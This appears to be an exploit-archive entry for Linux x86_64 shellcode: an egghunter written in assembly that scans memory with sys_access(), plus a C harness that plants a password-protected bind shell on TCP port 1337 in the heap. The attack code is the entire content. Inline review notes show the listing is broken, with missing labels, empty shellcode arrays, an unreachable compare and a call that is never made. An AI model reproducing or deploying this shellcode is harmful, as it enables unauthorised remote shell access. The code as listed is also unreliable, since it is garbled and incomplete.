Linux/x64 - Bind (1337/TCP) Shell + Password (pAzzW0rd) + Egghunter Using sys_access() Shellcode (49 bytes)

漏洞ID 1057182 漏洞类型
发布时间 2009-01-01 更新时间 2009-01-01
漏洞平台 Linux_x86-64 CVSS评分 N/A
; Author Doreth.Z10
; Linux x86_64 Egghunter using sys_access()
; Shellcode size 49 bytes

global _start

section .text


    ; NOTE(review): `global _start` is declared above, but no `_start:` label
    ; appears in this listing, and the `go_end_of_page` / `next_byte` jump
    ; targets used below are not defined anywhere in it either.  The label
    ; lines were most likely dropped during extraction -- verify against the
    ; original source before reading the control flow literally.
    ;
    ; Register roles (Linux x86_64, raw syscalls, NASM syntax):
    ;   rdx = candidate address currently being scanned
    ;   rdi = access(2) pathname argument, later the jump target
    ;   rsi = 0 (access mode F_OK); never written again below
    ;   rbx = 8, probe offset added to the candidate
    ;   rax = syscall number, then the syscall return value
    ;   eax = egg value during the compare
    ; `syscall` clobbers rcx and r11; nothing below relies on them.
    xor rsi, rsi        ; rsi = 0 -> access() mode argument = F_OK
    push rsi
    pop rdx             ; rdx = 0: the scan starts at address 0
    push 8
    pop rbx             ; rbx = 8

    or dx, 0xfff        ; rdx |= 0xfff: last byte of the current 0x1000 page
                        ; (only the low 16 bits are written; upper bits of rdx are kept)

    inc rdx             ; rdx += 1: next candidate byte (first byte of the next page after the `or`)
    push 21             ; 21 = __NR_access on Linux x86_64
    pop rax             ; rax = syscall number; re-loaded every iteration since syscall overwrites rax
    push rdx
    pop rdi             ; rdi = rdx
    add rdi, rbx        ; rdi = rdx + 8: probe 8 bytes past the candidate so an 8-byte marker
                        ; starting at rdx cannot straddle into an unmapped page
    syscall             ; access(rdi, F_OK); only the "mapped or not" outcome is used

    cmp al, 0xf2        ; -EFAULT = -14 = ...F2; only the low byte of the return value is compared
    jz go_end_of_page   ; unmapped page: skip the rest of it (label not defined in this listing)

    ; --
    ; Put your own egg here!

    mov eax, 0xBEBDBEBD ; egg stored inverted so the hunter's own bytes never match the marker
    not eax             ; eax = 0x41424142; NOT does not modify flags
    ; --
    mov rdi, rdx        ; rdi = candidate address (the probe above used rdx + 8); MOV does not modify flags
    ; NOTE(review): the flags consumed by the next `jnz` are still those set by
    ; `cmp al, 0xf2` above (mov / not / mov all preserve flags).  Because the
    ; `jz` was not taken, ZF is clear here, so this `jnz` is always taken and the
    ; compare and `jmp rdi` below are unreachable as listed.  Either a compare
    ; line was lost in extraction or the line order is scrambled -- verify
    ; against the original source.
    jnz next_byte       ; if egg does not match, try next byte
    cmp eax, [rdi]      ; compare the 4 bytes at the candidate with the egg (bytes 42 41 42 41 in memory)
    jnz next_byte       ; no match: advance one byte (label not defined in this listing)

    jmp rdi             ; match: control is transferred to the marker bytes themselves, which is
                        ; why the egg must decode as NOP-like instructions.
                        ; Note that only 4 bytes are compared here, while the `add rdi, rbx`
                        ; comment and the C harness below (which writes the egg twice)
                        ; describe an 8-byte marker -- the two are not consistent as listed.

; Egghunter demonstration
; The bindshell is placed in the heap using a malloc() call and prepended with the egg. Then the egghunter is run.
; Depending on the size of the malloc() call, the bindshell can be anywhere in the address space.
; For a big malloc() size like 1 000 000 bytes, it will be placed far in the address space.
; A malloc(1000000) was tested on an Ubuntu system with an Intel Core i7, and it took over 9 hrs for the egghunter
; to find the egg.
; Enjoy.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// Egg marker. This is a placeholder string; the harness below copies only
// its first 4 bytes (strncpy(..., 4)), twice, to form an 8-byte marker.
unsigned char egg[] = 
"YOUR EGG HERE 4 bytes";

// In this example we use a password protected bindshell on port 1337: pAzzW0rd 
// NOTE(review): the initializer (byte string) for this array is not present in
// the listing as shown; the harness copies 212 bytes from it and prints strlen()
// of it, both of which need the missing definition.
unsigned char bindshell[] = 

// NOTE(review): initializer likewise absent from this listing; the asm header
// above states the egghunter is 49 bytes.
unsigned char egghunter[] = 


    // NOTE(review): the enclosing function header (presumably `int main(...)`) is
    // not in the listing as shown; these lines are its body.
    // Lay out [egg][egg][bindshell] at the start of a large heap allocation.
    char *heap = (char*)malloc(1000000);    // 1,000,000-byte buffer; the NULL return case is not checked before use
    memset(heap, '\0', 512);                // only the first 512 bytes are zeroed; the rest of the allocation stays uninitialized
    strncpy(heap, egg, 4);                  // marker, first 4 bytes
    strncpy(heap+4, egg, 4);                // marker repeated -> 8-byte marker at offset 0
    strncpy(heap+8, bindshell, 212);        // payload at offset 8; strncpy stops at the first NUL byte and zero-fills the rest

    // NOTE(review): strlen() returns size_t, but the format uses %d (expects int);
    // %zu is the matching specifier.  strlen() also stops at the first NUL byte,
    // so the printed lengths are only meaningful for NUL-free byte strings.
    printf("Egghunter Length: %d\n", strlen(egghunter));
    printf("Shellcode Length: %d\n", strlen(bindshell));
        // Function-pointer view of the byte array.  `ret` is assigned but never used
        // in the lines shown; the invocation the header comment describes ("Then
        // egghunter is fired") is not present in this listing.  The 8-space indent
        // is inconsistent with the surrounding statements.
        int (*ret)() = (int(*)())egghunter;
    return 0;